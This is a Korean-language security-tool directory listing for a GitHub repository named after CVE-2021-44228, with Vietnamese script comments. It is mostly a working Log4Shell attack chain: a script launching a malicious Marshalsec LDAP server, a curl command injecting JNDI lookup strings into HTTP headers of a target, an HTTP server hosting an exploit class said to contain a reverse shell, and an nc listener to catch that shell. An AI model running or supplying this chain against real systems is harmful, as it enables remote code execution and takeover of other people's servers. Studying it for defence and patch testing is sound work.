Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-44228-Log4Shell- — 침투 테스트 | Kitploit
도구/GitHubGitHub/khaidtraivch/cve-2021-44228-log4shell-
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlRemote Access Tool
GitHubkhaidtraivch/cve-2021-44228-log4shell-

CVE-2021-44228-Log4Shell-

침투 테스트

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
21년 전아직 검토되지 않음

CVE-2021-44228-Log4Shell-

침투 테스트

  1. 악성 LDAP 서버 생성 (Marshalsec 사용) #!/bin/bash

Script: start_ldap_server.sh

Yêu cầu: Cài đặt Java và Marshalsec (https://github.com/mbechler/marshalsec)

LDAP_PORT="1389" HTTP_PORT="8000" ATTACKER_IP="192.168.0.101" REVERSE_PORT="5555"

echo "[+] Khởi động LDAP server độc hại trên port $LDAP_PORT..." java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://$ATTACKER_IP:$HTTP_PORT/#Exploit" $LDAP_PORT

  1. 손상된 웹서버에서 Log4Shell 페이로드 전송

#!/bin/bash

Script: exploit_log4shell.sh

Mục tiêu: Gửi payload JNDI đến máy trạm Windows

TARGET_IP="192.168.1.10" ATTACKER_IP="192.168.0.101" LDAP_PORT="1389"

echo "[+] Gửi payload Log4Shell đến $TARGET_IP..." curl -X GET
"http://$TARGET_IP"
-H "User-Agent: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"
-H "X-Api-Version: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"

사용 방법

LDAP 서버 시작:

./start_ldap_server.sh

HTTP 서버를 시작하여 Exploit.class 파일 호스팅 (리버스 셸 포함):

python3 -m http.server 8000

손상된 웹서버에서 페이로드 전송

./exploit_log4shell.sh

공격자 머신에서 리버스 셸 대기:

nc -lvnp 5555

도구 다운로드